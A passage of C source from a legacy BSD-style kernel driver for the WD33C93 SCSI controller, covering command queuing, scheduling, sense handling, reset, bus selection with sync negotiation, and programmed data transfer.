*/ int sbic_scsicmd(xs) struct scsipi_xfer *xs; { struct sbic_acb *acb; struct sbic_softc *dev; struct scsipi_link *slp; int flags, s, stat; slp = xs->sc_link; dev = slp->adapter_softc; SBIC_TRACE(dev); flags = xs->flags; if (flags & SCSI_DATA_UIO) panic("sbic: scsi data uio requested"); if (dev->sc_nexus && flags & SCSI_POLL) panic("sbic_scsicmd: busy"); if (slp->scsipi_scsi.target == slp->scsipi_scsi.adapter_target) return ESCAPE_NOT_SUPPORTED; s = splbio(); acb = dev->free_list.tqh_first; if (acb) TAILQ_REMOVE(&dev->free_list, acb, chain); splx(s); if (acb == NULL) { #ifdef DEBUG printf("sbic_scsicmd: unable to queue request for target %d\n", slp->scsipi_scsi.target); #ifdef DDB Debugger(); #endif #endif xs->error = XS_DRIVER_STUFFUP; SBIC_TRACE(dev); return(TRY_AGAIN_LATER); } acb->flags = ACB_ACTIVE; if (flags & SCSI_DATA_IN) acb->flags |= ACB_DATAIN; acb->xs = xs; bcopy(xs->cmd, &acb->cmd, xs->cmdlen); acb->clen = xs->cmdlen; acb->sc_kv.dc_addr = xs->data; acb->sc_kv.dc_count = xs->datalen; #if 0 acb->pa_addr = xs->data ? (char *)kvtop(xs->data) : 0; /* XXXX check */ #endif if (flags & SCSI_POLL) { s = splbio(); /* * This has major side effects -- it locks up the machine */ dev->sc_flags |= SBICF_ICMD; do { while(dev->sc_nexus) sbicpoll(dev); dev->sc_nexus = acb; dev->sc_stat[0] = -1; dev->sc_xs = xs; dev->target = slp->scsipi_scsi.target; dev->lun = slp->scsipi_scsi.lun; stat = sbicicmd(dev, slp->scsipi_scsi.target, slp->scsipi_scsi.lun, &acb->cmd, acb->clen, acb->sc_kv.dc_addr, acb->sc_kv.dc_count); } while (dev->sc_nexus != acb); sbic_scsidone(acb, stat); splx(s); SBIC_TRACE(dev); return(COMPLETE); } s = splbio(); TAILQ_INSERT_TAIL(&dev->ready_list, acb, chain); if (dev->sc_nexus) { splx(s); SBIC_TRACE(dev); return(SUCCESSFULLY_QUEUED); } /* * nothing is active, try to start it now. 
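 * (sbic_sched() starts the first ACB on the ready list whose target/LUN
 * is not already busy.)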
*/ sbic_sched(dev); splx(s); SBIC_TRACE(dev); /* TODO: add sbic_poll to do SCSI_POLL operations */ #if 0 if (flags & SCSI_POLL) return(COMPLETE); #endif return(SUCCESSFULLY_QUEUED); } /* * attempt to start the next available command */ void sbic_sched(dev) struct sbic_softc *dev; { struct scsipi_xfer *xs; struct scsipi_link *slp; struct sbic_acb *acb; int flags, /*phase,*/ stat, i; SBIC_TRACE(dev); if (dev->sc_nexus) return; /* a command is current active */ SBIC_TRACE(dev); for (acb = dev->ready_list.tqh_first; acb; acb = acb->chain.tqe_next) { slp = acb->xs->sc_link; i = slp->scsipi_scsi.target; if (!(dev->sc_tinfo[i].lubusy & (1 << slp->scsipi_scsi.lun))) { struct sbic_tinfo *ti = &dev->sc_tinfo[i]; TAILQ_REMOVE(&dev->ready_list, acb, chain); dev->sc_nexus = acb; slp = acb->xs->sc_link; ti = &dev->sc_tinfo[slp->scsipi_scsi.target]; ti->lubusy |= (1 << slp->scsipi_scsi.lun); acb->sc_pa.dc_addr = acb->pa_addr; /* XXXX check */ break; } } SBIC_TRACE(dev); if (acb == NULL) return; /* did not find an available command */ dev->sc_xs = xs = acb->xs; slp = xs->sc_link; flags = xs->flags; if (flags & SCSI_RESET) sbicreset(dev); #ifdef DEBUG if( data_pointer_debug > 1 ) printf("sbic_sched(%d,%d)\n",slp->scsipi_scsi.target,slp->scsipi_scsi.lun); #endif dev->sc_stat[0] = -1; dev->target = slp->scsipi_scsi.target; dev->lun = slp->scsipi_scsi.lun; if ( flags & SCSI_POLL || ( !sbic_parallel_operations && (/*phase == STATUS_PHASE ||*/ sbicdmaok(dev, xs) == 0) ) ) stat = sbicicmd(dev, slp->scsipi_scsi.target, slp->scsipi_scsi.lun, &acb->cmd, acb->clen, acb->sc_kv.dc_addr, acb->sc_kv.dc_count); else if (sbicgo(dev, xs) == 0) { SBIC_TRACE(dev); return; } else stat = dev->sc_stat[0]; sbic_scsidone(acb, stat); SBIC_TRACE(dev); } void sbic_scsidone(acb, stat) struct sbic_acb *acb; int stat; { struct scsipi_xfer *xs; struct scsipi_link *slp; struct sbic_softc *dev; /* int s;*/ int dosched = 0; xs = acb->xs; slp = xs->sc_link; dev = slp->adapter_softc; SBIC_TRACE(dev); #ifdef DIAGNOSTIC if (acb == NULL || xs == NULL) { printf("sbic_scsidone -- (%d,%d) no scsipi_xfer\n", dev->target, dev->lun); #ifdef DDB Debugger(); #endif return; } #endif /* * is this right? 
*/ xs->status = stat; #ifdef DEBUG if( data_pointer_debug > 1 ) printf("scsidone: (%d,%d)->(%d,%d)%02x\n", slp->scsipi_scsi.target, slp->scsipi_scsi.lun, dev->target, dev->lun, stat); if( xs->sc_link->scsipi_scsi.target == dev->sc_link.scsipi_scsi.adapter_target ) panic("target == hostid"); #endif if (xs->error == XS_NOERROR && !(acb->flags & ACB_CHKSENSE)) { if (stat == SCSI_CHECK) { /* Schedule a REQUEST SENSE */ struct scsipi_sense *ss = (void *)&acb->cmd; #ifdef DEBUG if (report_sense) printf("sbic_scsidone: autosense %02x targ %d lun %d", acb->cmd.opcode, slp->scsipi_scsi.target, slp->scsipi_scsi.lun); #endif bzero(ss, sizeof(*ss)); ss->opcode = REQUEST_SENSE; ss->byte2 = slp->scsipi_scsi.lun << 5; ss->length = sizeof(struct scsipi_sense_data); acb->clen = sizeof(*ss); acb->sc_kv.dc_addr = (char *)&xs->sense.scsi_sense; acb->sc_kv.dc_count = sizeof(struct scsipi_sense_data); #if 0 acb->pa_addr = (char *)kvtop(&xs->sense.scsi_sense); /* XXX check */ #endif acb->flags = ACB_ACTIVE | ACB_CHKSENSE | ACB_DATAIN; bzero(acb->sc_kv.dc_addr, acb->clen); TAILQ_INSERT_HEAD(&dev->ready_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1 << slp->scsipi_scsi.lun); dev->sc_tinfo[slp->scsipi_scsi.target].senses++; if (dev->sc_nexus == acb) { dev->sc_nexus = NULL; dev->sc_xs = NULL; sbic_sched(dev); } SBIC_TRACE(dev); return; } } if (xs->error == XS_NOERROR && (acb->flags & ACB_CHKSENSE)) { QPRINTF(("status = %0x\n", stat)); if (xs->sense.scsi_sense.error_code == 0) { struct scsipi_sense *ss = (void *)&acb->cmd; QPRINTF(("Retrying sense.\n")); bzero(ss, sizeof(*ss)); ss->opcode = REQUEST_SENSE; ss->byte2 = slp->scsipi_scsi.lun << 5; ss->length = sizeof(struct scsipi_sense_data); acb->clen = sizeof(*ss); acb->sc_kv.dc_addr = (char *)&xs->sense.scsi_sense; acb->sc_kv.dc_count = sizeof(struct scsipi_sense_data); acb->flags = ACB_ACTIVE | ACB_CHKSENSE | ACB_DATAIN; bzero(acb->sc_kv.dc_addr, acb->clen); TAILQ_INSERT_HEAD(&dev->ready_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1 << slp->scsipi_scsi.lun); dev->sc_tinfo[slp->scsipi_scsi.target].senses++; if (dev->sc_nexus == acb) { dev->sc_nexus = NULL; dev->sc_xs = NULL; sbic_sched(dev); } SBIC_TRACE(dev); return; } xs->error = XS_SENSE; #ifdef DEBUG if (report_sense) printf(" => %02x %02x %02x\n", xs->sense.scsi_sense.error_code, xs->sense.scsi_sense.flags, xs->sense.scsi_sense.extra_bytes[3]); #endif } else { xs->resid = 0; /* XXXX */ } #if whataboutthisone case SCSI_BUSY: xs->error = XS_BUSY; break; #endif xs->flags |= ITSDONE; /* * Remove the ACB from whatever queue it's on. We have to do a bit of * a hack to figure out which queue it's on. Note that it is *not* * necessary to cdr down the ready queue, but we must cdr down the * nexus queue and see if it's there, so we can mark the unit as no * longer busy. This code is sickening, but it works. 
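 * Concretely: if the ACB is the current nexus we just clear the nexus
 * (and maybe reschedule); if it is the last entry on the ready list we
 * unlink it directly; otherwise we search the nexus (disconnected) list,
 * clearing the LUN-busy bit if it is found there, and fall back to the
 * ready list as a last resort.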
*/ if (acb == dev->sc_nexus) { dev->sc_nexus = NULL; dev->sc_xs = NULL; dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1<<slp->scsipi_scsi.lun); if (dev->ready_list.tqh_first) dosched = 1; /* start next command */ } else if (dev->ready_list.tqh_last == &acb->chain.tqe_next) { TAILQ_REMOVE(&dev->ready_list, acb, chain); } else { register struct sbic_acb *acb2; for (acb2 = dev->nexus_list.tqh_first; acb2; acb2 = acb2->chain.tqe_next) { if (acb2 == acb) { TAILQ_REMOVE(&dev->nexus_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1<<slp->scsipi_scsi.lun); break; } } if (acb2) ; else if (acb->chain.tqe_next) { TAILQ_REMOVE(&dev->ready_list, acb, chain); } else { printf("%s: can't find matching acb\n", dev->sc_dev.dv_xname); #ifdef DDB Debugger(); #endif } } /* Put it on the free list. */ acb->flags = ACB_FREE; TAILQ_INSERT_HEAD(&dev->free_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].cmds++; scsipi_done(xs); if (dosched) sbic_sched(dev); SBIC_TRACE(dev); } int sbicdmaok(dev, xs) struct sbic_softc *dev; struct scsipi_xfer *xs; { if (sbic_no_dma || xs->datalen & 0x1 || (u_int)xs->data & 0x3) return(0); /* * controller supports dma to any addresses? */ else if ((dev->sc_flags & SBICF_BADDMA) == 0) return(1); /* * this address is ok for dma? */ else if (sbiccheckdmap(xs->data, xs->datalen, dev->sc_dmamask) == 0) return(1); /* * we have a bounce buffer? */ else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce) return(1); /* * try to get one */ else panic("sbic: cannot do DMA\n"); #if 0 else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce = (char *)alloc_z2mem(MAXPHYS)) { if (isztwomem(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)) printf("alloc ZII target %d bounce pa 0x%x\n", xs->sc_link->scsipi_scsi.target, kvtop(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce) printf("alloc CHIP target %d bounce pa 0x%x\n", xs->sc_link->scsipi_scsi.target, PREP_DMA_MEM(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); return(1); } #endif return(0); } int sbicwait(regs, until, timeo, line) sbic_regmap_p regs; char until; int timeo; int line; { u_char val; int csr; SBIC_TRACE((struct sbic_softc *)0); if (timeo == 0) timeo = 1000000; /* some large value.. */ GET_SBIC_asr(regs,val); while ((val & until) == 0) { if (timeo-- == 0) { GET_SBIC_csr(regs, csr); printf("sbicwait TIMEO @%d with asr=x%x csr=x%x\n", line, val, csr); #if defined(DDB) && defined(DEBUG) Debugger(); #endif return(val); /* Maybe I should abort */ break; } DELAY(1); GET_SBIC_asr(regs,val); } SBIC_TRACE((struct sbic_softc *)0); return(val); } int sbicabort(dev, regs, where) struct sbic_softc *dev; sbic_regmap_p regs; char *where; { u_char csr, asr; GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); printf ("%s: abort %s: csr = 0x%02x, asr = 0x%02x\n", dev->sc_dev.dv_xname, where, csr, asr); #if 0 /* Clean up running command */ if (dev->sc_nexus != NULL) { dev->sc_nexus->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(dev->sc_nexus, dev->sc_stat[0]); } while (acb = dev->nexus_list.tqh_first) { acb->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(acb, -1 /*acb->stat[0]*/); } #endif /* Clean up chip itself */ if (dev->sc_flags & SBICF_SELECTED) { while( asr & SBIC_ASR_DBR ) { /* sbic is jammed w/data. 
need to clear it */ /* But we don't know what direction it needs to go */ GET_SBIC_data(regs, asr); printf("%s: abort %s: clearing data buffer 0x%02x\n", dev->sc_dev.dv_xname, where, asr); GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR ) /* Not the read direction, then */ SET_SBIC_data(regs, asr); GET_SBIC_asr(regs, asr); } WAIT_CIP(regs); printf("%s: sbicabort - sending ABORT command\n", dev->sc_dev.dv_xname); SET_SBIC_cmd(regs, SBIC_CMD_ABORT); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); if (asr & (SBIC_ASR_BSY|SBIC_ASR_LCI)) { /* ok, get more drastic.. */ printf("%s: sbicabort - asr %x, trying to reset\n", dev->sc_dev.dv_xname, asr); sbicreset(dev); dev->sc_flags &= ~SBICF_SELECTED; return -1; } printf("%s: sbicabort - sending DISC command\n", dev->sc_dev.dv_xname); SET_SBIC_cmd(regs, SBIC_CMD_DISC); do { asr = SBIC_WAIT (regs, SBIC_ASR_INT, 0); GET_SBIC_csr (regs, csr); CSR_TRACE('a',csr,asr,0); } while ((csr != SBIC_CSR_DISC) && (csr != SBIC_CSR_DISC_1) && (csr != SBIC_CSR_CMD_INVALID)); /* lets just hope it worked.. */ dev->sc_flags &= ~SBICF_SELECTED; } return -1; } /* * Initialize driver-private structures */ void sbicinit(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_int i; /* u_int my_id, s;*/ /* u_char csr;*/ struct sbic_acb *acb; u_int inhibit_sync; extern u_long scsi_nosync; extern int shift_nosync; #ifdef SBIC_DEBUG printf("sbicinit:\n"); #endif regs = dev->sc_sbicp; if ((dev->sc_flags & SBICF_ALIVE) == 0) { TAILQ_INIT(&dev->ready_list); TAILQ_INIT(&dev->nexus_list); TAILQ_INIT(&dev->free_list); dev->sc_nexus = NULL; dev->sc_xs = NULL; acb = dev->sc_acb; bzero(acb, sizeof(dev->sc_acb)); #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif for (i = 0; i < sizeof(dev->sc_acb) / sizeof(*acb); i++) { TAILQ_INSERT_TAIL(&dev->free_list, acb, chain); acb++; } bzero(dev->sc_tinfo, sizeof(dev->sc_tinfo)); #ifdef DEBUG /* make sure timeout is really not needed */ timeout((void *)sbictimeout, dev, 30 * hz); #endif } else panic("sbic: reinitializing driver!"); #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif dev->sc_flags |= SBICF_ALIVE; dev->sc_flags &= ~SBICF_SELECTED; /* initialize inhibit array */ if (scsi_nosync) { #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif inhibit_sync = (scsi_nosync >> shift_nosync) & 0xff; shift_nosync += 8; #ifdef DEBUG if (inhibit_sync) printf("%s: Inhibiting synchronous transfer %02x\n", dev->sc_dev.dv_xname, inhibit_sync); #endif for (i = 0; i < 8; ++i) if (inhibit_sync & (1 << i)) sbic_inhibit_sync[i] = 1; } #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif sbicreset(dev); } void sbicreset(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_int my_id, s; /* u_int i;*/ u_char csr; /* struct sbic_acb *acb;*/ #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif regs = dev->sc_sbicp; #ifdef SBIC_DEBUG printf("sbicreset: regs = %08x\n", regs); #endif #if 0 if (dev->sc_flags & SBICF_ALIVE) { SET_SBIC_cmd(regs, SBIC_CMD_ABORT); WAIT_CIP(regs); } #else SET_SBIC_cmd(regs, SBIC_CMD_ABORT); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif WAIT_CIP(regs); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif #endif s = splbio(); my_id = dev->sc_link.scsipi_scsi.adapter_target & SBIC_ID_MASK; /* Enable advanced mode */ my_id |= SBIC_ID_EAF /*| SBIC_ID_EHP*/ ; SET_SBIC_myid(regs, my_id); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif /* * Disable interrupts (in dmainit) then reset the chip */ SET_SBIC_cmd(regs, SBIC_CMD_RESET); DELAY(25); SBIC_WAIT(regs, SBIC_ASR_INT, 0); 
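    /*
     * The reset sequence has finished once SBIC_ASR_INT is set; the CSR
     * read below acknowledges it.  The input-clock range bits
     * (SBIC_ID_FS_*) are then chosen to match the board's clock
     * frequency and written back along with our SCSI id.
     */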
GET_SBIC_csr(regs, csr); /* clears interrupt also */ if (dev->sc_clkfreq < 110) my_id |= SBIC_ID_FS_8_10; else if (dev->sc_clkfreq < 160) my_id |= SBIC_ID_FS_12_15; else if (dev->sc_clkfreq < 210) my_id |= SBIC_ID_FS_16_20; SET_SBIC_myid(regs, my_id); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif /* * Set up various chip parameters */ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI /* | SBIC_CTL_HSP */ | SBIC_MACHINE_DMA_MODE); /* * don't allow (re)selection (SBIC_RID_ES) * until we can handle target mode!! */ SET_SBIC_rselid(regs, SBIC_RID_ER); SET_SBIC_syn(regs, 0); /* asynch for now */ /* * anything else was zeroed by reset */ splx(s); #if 0 if ((dev->sc_flags & SBICF_ALIVE) == 0) { TAILQ_INIT(&dev->ready_list); TAILQ_INIT(&dev->nexus_list); TAILQ_INIT(&dev->free_list); dev->sc_nexus = NULL; dev->sc_xs = NULL; acb = dev->sc_acb; bzero(acb, sizeof(dev->sc_acb)); for (i = 0; i < sizeof(dev->sc_acb) / sizeof(*acb); i++) { TAILQ_INSERT_TAIL(&dev->free_list, acb, chain); acb++; } bzero(dev->sc_tinfo, sizeof(dev->sc_tinfo)); } else { if (dev->sc_nexus != NULL) { dev->sc_nexus->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(dev->sc_nexus, dev->sc_stat[0]); } while (acb = dev->nexus_list.tqh_first) { acb->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(acb, -1 /*acb->stat[0]*/); } } dev->sc_flags |= SBICF_ALIVE; #endif dev->sc_flags &= ~SBICF_SELECTED; } void sbicerror(dev, regs, csr) struct sbic_softc *dev; sbic_regmap_p regs; u_char csr; { struct scsipi_xfer *xs; xs = dev->sc_xs; #ifdef DIAGNOSTIC if (xs == NULL) panic("sbicerror"); #endif if (xs->flags & SCSI_SILENT) return; printf("%s: ", dev->sc_dev.dv_xname); printf("csr == 0x%02x\n", csr); /* XXX */ } /* * select the bus, return when selected or error. */ int sbicselectbus(dev, regs, target, lun, our_addr) struct sbic_softc *dev; sbic_regmap_p regs; u_char target, lun, our_addr; { u_char asr, csr, id; SBIC_TRACE(dev); QPRINTF(("sbicselectbus %d\n", target)); /* * if we're already selected, return (XXXX panic maybe?) 
*/ if (dev->sc_flags & SBICF_SELECTED) { SBIC_TRACE(dev); return(1); } /* * issue select */ SBIC_TC_PUT(regs, 0); SET_SBIC_selid(regs, target); SET_SBIC_timeo(regs, SBIC_TIMEOUT(250,dev->sc_clkfreq)); /* * set sync or async */ if (dev->sc_sync[target].state == SYNC_DONE) SET_SBIC_syn(regs, SBIC_SYN (dev->sc_sync[target].offset, dev->sc_sync[target].period)); else SET_SBIC_syn(regs, SBIC_SYN (0, sbic_min_period)); GET_SBIC_asr(regs, asr); if( asr & (SBIC_ASR_INT|SBIC_ASR_BSY) ) { /* This means we got ourselves reselected upon */ /* printf("sbicselectbus: INT/BSY asr %02x\n", asr);*/ #ifdef DDB /* Debugger();*/ #endif SBIC_TRACE(dev); return 1; } SET_SBIC_cmd(regs, SBIC_CMD_SEL_ATN); /* * wait for select (merged from seperate function may need * cleanup) */ WAIT_CIP(regs); do { asr = SBIC_WAIT(regs, SBIC_ASR_INT | SBIC_ASR_LCI, 0); if (asr & SBIC_ASR_LCI) { #ifdef DEBUG if (reselect_debug) printf("sbicselectbus: late LCI asr %02x\n", asr); #endif SBIC_TRACE(dev); return 1; } GET_SBIC_csr (regs, csr); CSR_TRACE('s',csr,asr,target); QPRINTF(("%02x ", csr)); if( csr == SBIC_CSR_RSLT_NI || csr == SBIC_CSR_RSLT_IFY) { #ifdef DEBUG if(reselect_debug) printf("sbicselectbus: reselected asr %02x\n", asr); #endif /* We need to handle this now so we don't lock up later */ sbicnextstate(dev, csr, asr); SBIC_TRACE(dev); return 1; } if( csr == SBIC_CSR_SLT || csr == SBIC_CSR_SLT_ATN) { panic("sbicselectbus: target issued select!"); return 1; } } while (csr != (SBIC_CSR_MIS_2|MESG_OUT_PHASE) && csr != (SBIC_CSR_MIS_2|CMD_PHASE) && csr != SBIC_CSR_SEL_TIMEO); /* Enable (or not) reselection */ if(!sbic_enable_reselect && dev->nexus_list.tqh_first == NULL) SET_SBIC_rselid (regs, 0); else SET_SBIC_rselid (regs, SBIC_RID_ER); if (csr == (SBIC_CSR_MIS_2|CMD_PHASE)) { dev->sc_flags |= SBICF_SELECTED; /* device ignored ATN */ GET_SBIC_selid(regs, id); dev->target = id; GET_SBIC_tlun(regs,dev->lun); if( dev->lun & SBIC_TLUN_VALID ) dev->lun &= SBIC_TLUN_MASK; else dev->lun = lun; } else if (csr == (SBIC_CSR_MIS_2|MESG_OUT_PHASE)) { /* * Send identify message * (SCSI-2 requires an identify msg (?)) */ GET_SBIC_selid(regs, id); dev->target = id; GET_SBIC_tlun(regs,dev->lun); if( dev->lun & SBIC_TLUN_VALID ) dev->lun &= SBIC_TLUN_MASK; else dev->lun = lun; /* * handle drives that don't want to be asked * whether to go sync at all. */ if (sbic_inhibit_sync[id] && dev->sc_sync[id].state == SYNC_START) { #ifdef DEBUG if (sync_debug) printf("Forcing target %d asynchronous.\n", id); #endif dev->sc_sync[id].offset = 0; dev->sc_sync[id].period = sbic_min_period; dev->sc_sync[id].state = SYNC_DONE; } if (dev->sc_sync[id].state != SYNC_START){ if( dev->sc_xs->flags & SCSI_POLL || (dev->sc_flags & SBICF_ICMD) || !sbic_enable_reselect ) SEND_BYTE (regs, MSG_IDENTIFY | lun); else SEND_BYTE (regs, MSG_IDENTIFY_DR | lun); } else { /* * try to initiate a sync transfer. * So compose the sync message we're going * to send to the target */ #ifdef DEBUG if (sync_debug) printf("Sending sync request to target %d ... 
", id); #endif /* * setup scsi message sync message request */ dev->sc_msg[0] = MSG_IDENTIFY | lun; dev->sc_msg[1] = MSG_EXT_MESSAGE; dev->sc_msg[2] = 3; dev->sc_msg[3] = MSG_SYNC_REQ; dev->sc_msg[4] = sbictoscsiperiod(dev, regs, sbic_min_period); dev->sc_msg[5] = sbic_max_offset; if (sbicxfstart(regs, 6, MESG_OUT_PHASE, sbic_cmd_wait)) sbicxfout(regs, 6, dev->sc_msg, MESG_OUT_PHASE); dev->sc_sync[id].state = SYNC_SENT; #ifdef DEBUG if (sync_debug) printf ("sent\n"); #endif } asr = SBIC_WAIT (regs, SBIC_ASR_INT, 0); GET_SBIC_csr (regs, csr); CSR_TRACE('y',csr,asr,target); QPRINTF(("[%02x]", csr)); #ifdef DEBUG if (sync_debug && dev->sc_sync[id].state == SYNC_SENT) printf("csr-result of last msgout: 0x%x\n", csr); #endif if (csr != SBIC_CSR_SEL_TIMEO) dev->sc_flags |= SBICF_SELECTED; } if (csr == SBIC_CSR_SEL_TIMEO) dev->sc_xs->error = XS_SELTIMEOUT; QPRINTF(("\n")); SBIC_TRACE(dev); return(csr == SBIC_CSR_SEL_TIMEO); } int sbicxfstart(regs, len, phase, wait) sbic_regmap_p regs; int len, wait; u_char phase; { u_char id; switch (phase) { case DATA_IN_PHASE: case MESG_IN_PHASE: GET_SBIC_selid (regs, id); id |= SBIC_SID_FROM_SCSI; SET_SBIC_selid (regs, id); SBIC_TC_PUT (regs, (unsigned)len); break; case DATA_OUT_PHASE: case MESG_OUT_PHASE: case CMD_PHASE: GET_SBIC_selid (regs, id); id &= ~SBIC_SID_FROM_SCSI; SET_SBIC_selid (regs, id); SBIC_TC_PUT (regs, (unsigned)len); break; default: SBIC_TC_PUT (regs, 0); } QPRINTF(("sbicxfstart %d, %d, %d\n", len, phase, wait)); return(1); } int sbicxfout(regs, len, bp, phase) sbic_regmap_p regs; int len; void *bp; int phase; { u_char orig_csr, asr, *buf; /* u_char csr;*/ int wait; buf = bp; wait = sbic_data_wait; QPRINTF(("sbicxfout {%d} %02x %02x %02x %02x %02x " "%02x %02x %02x %02x %02x\n", len, buf[0], buf[1], buf[2], buf[3], buf[4], buf[5], buf[6], buf[7], buf[8], buf[9])); #ifdef UNPROTECTED_CSR GET_SBIC_csr (regs, orig_csr); CSR_TRACE('>',orig_csr,0,0); #endif /* * sigh.. WD-PROTO strikes again.. sending the command in one go * causes the chip to lock up if talking to certain (misbehaving?) * targets. 
Anyway, this procedure should work for all targets, but
 * it's slightly slower due to the overhead
 */
    WAIT_CIP (regs);
    SET_SBIC_cmd (regs, SBIC_CMD_XFER_INFO);
    for (;len > 0; len--) {
        GET_SBIC_asr (regs, asr);
        while ((asr & SBIC_ASR_DBR) == 0) {
            if ((asr & SBIC_ASR_INT) || --wait < 0) {
#ifdef DEBUG
                if (sbic_debug)
                    printf("sbicxfout fail: l%d i%x w%d\n",
                        len, asr, wait);
#endif
                return (len);
            }
/*          DELAY(1);*/
            GET_SBIC_asr (regs, asr);
        }
        SET_SBIC_data (regs, *buf);
        buf++;
    }
    SBIC_TC_GET(regs, len);
    QPRINTF(("sbicxfout done %d bytes\n", len));
    /*
     * this leaves with one csr to be read
     */
    return(0);
}

/* returns # bytes left to read */
int
sbicxfin(regs, len, bp)
    sbic_regmap_p regs;
    int len;
    void *bp;
{
    int wait;
/*  int read;*/
    u_char *obp, *buf;
    u_char orig_csr, csr, asr;

    wait = sbic_data_wait;
    obp = bp;
    buf = bp;

#ifdef UNPROTECTED_CSR
    GET_SBIC_csr (regs, orig_csr);
    CSR_TRACE('<',orig_csr,0,0);
    QPRINTF(("sbicxfin %d, csr=%02x\n", len, orig_csr));
#endif

    WAIT_CIP (regs);
    SET_SBIC_cmd (regs, SBIC_CMD_XFER_INFO);
    for (;len > 0; len--) {
        GET_SBIC_asr (regs, asr);
        if ((asr & SBIC_ASR_PE)) {
#ifdef DEBUG
            printf("sbicxfin parity error: l%d i%x w%d\n", len, asr, wait);
/*          return ((unsigned long)buf - (unsigned long)bp); */
#ifdef DDB
            Debugger();
#endif
#endif
        }
        while ((asr & SBIC_ASR_DBR) == 0) {
            if ((asr & SBIC_ASR_INT) || --wait < 0) {
#ifdef DEBUG
                if (sbic_debug) {
                    QPRINTF(("sbicxfin fail:{%d} %02x %02x %02x %02x %02x %02x "
                        "%02x %02x %02x %02x\n", len,
                        obp[0], obp[1], obp[2], obp[3], obp[4],
                        obp[5], obp[6], obp[7], obp[8], obp[9]));
                    printf("sbicxfin fail: l%d i%x w%d\n", len, asr, wait);
                }
#endif
                return len;
            }
#ifdef UNPROTECTED_CSR
            /* Peek at the CSR only while the chip is not busy. */
            if ( !(asr & SBIC_ASR_BSY) ) {
                GET_SBIC_csr(regs, csr);
                CSR_TRACE('<',csr,asr,len);
                QPRINTF(("[CSR%02xASR%02x]", csr, asr));
            }
#endif
/*          DELAY(1);*/
            GET_SBIC_asr (regs, asr);
        }
        GET_SBIC_data (regs, *buf);
/*      QPRINTF(("asr=%02x, csr=%02x, data=%02x\n", asr, csr, *buf));*/
        buf++;
    }
    QPRINTF(("sbicxfin {%d} %02x %02x %02x %02x %02x %02x "
        "%02x %02x %02x %02x\n", len,
        obp[0], obp[1], obp[2], obp[3], obp[4],
        obp[5], obp[6], obp[7], obp[8], obp[9]));
    /* this leaves with one csr to be read */
    return len;
}

/*
 * SCSI 'immediate' command: issue a command to some SCSI device
 * and get back an 'immediate' response (i.e., do programmed xfer
 * to get the response data). 'cbuf' is a buffer containing a scsi
 * command of length clen bytes. 'buf' is a buffer of length 'len'
 * bytes for data. The transfer direction is determined by the device
 * (i.e., by the scsi bus data xfer phase). If 'len' is zero, the
 * command must supply no data.
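 * The command runs with the SCSI bus "stolen" (SBICF_ICMD set) and the
 * chip polled throughout, so the machine is effectively locked up for
 * the duration.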
*/ int sbicicmd(dev, target, lun, cbuf, clen, buf, len) struct sbic_softc *dev; void *cbuf, *buf; int clen, len; { sbic_regmap_p regs; u_char phase, csr, asr; int wait; /* int newtarget, cmd_sent, parity_err;*/ struct sbic_acb *acb; /* int discon;*/ int i; #define CSR_LOG_BUF_SIZE 0 #if CSR_LOG_BUF_SIZE int bufptr; int csrbuf[CSR_LOG_BUF_SIZE]; bufptr=0; #endif SBIC_TRACE(dev); regs = dev->sc_sbicp; acb = dev->sc_nexus; /* Make sure pointers are OK */ dev->sc_last = dev->sc_cur = &acb->sc_pa; dev->sc_tcnt = acb->sc_tcnt = 0; acb->sc_pa.dc_count = 0; /* No DMA */ acb->sc_kv.dc_addr = buf; acb->sc_kv.dc_count = len; #ifdef DEBUG routine = 3; debug_sbic_regs = regs; /* store this to allow debug calls */ if( data_pointer_debug > 1 ) printf("sbicicmd(%d,%d):%d\n", target, lun, acb->sc_kv.dc_count); #endif /* * set the sbic into non-DMA mode */ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI /*| SBIC_CTL_HSP*/); dev->sc_stat[0] = 0xff; dev->sc_msg[0] = 0xff; i = 1; /* pre-load */ /* We're stealing the SCSI bus */ dev->sc_flags |= SBICF_ICMD; do { /* * select the SCSI bus (it's an error if bus isn't free) */ if (!( dev->sc_flags & SBICF_SELECTED ) && sbicselectbus(dev, regs, target, lun, dev->sc_scsiaddr)) { /*printf("sbicicmd trying to select busy bus!\n");*/ dev->sc_flags &= ~SBICF_ICMD; return(-1); } /* * Wait for a phase change (or error) then let the device sequence * us through the various SCSI phases. */ wait = sbic_cmd_wait; asr = GET_SBIC_asr (regs, asr); GET_SBIC_csr (regs, csr); CSR_TRACE('I',csr,asr,target); QPRINTF((">ASR:%02xCSR:%02x<", asr, csr)); #if 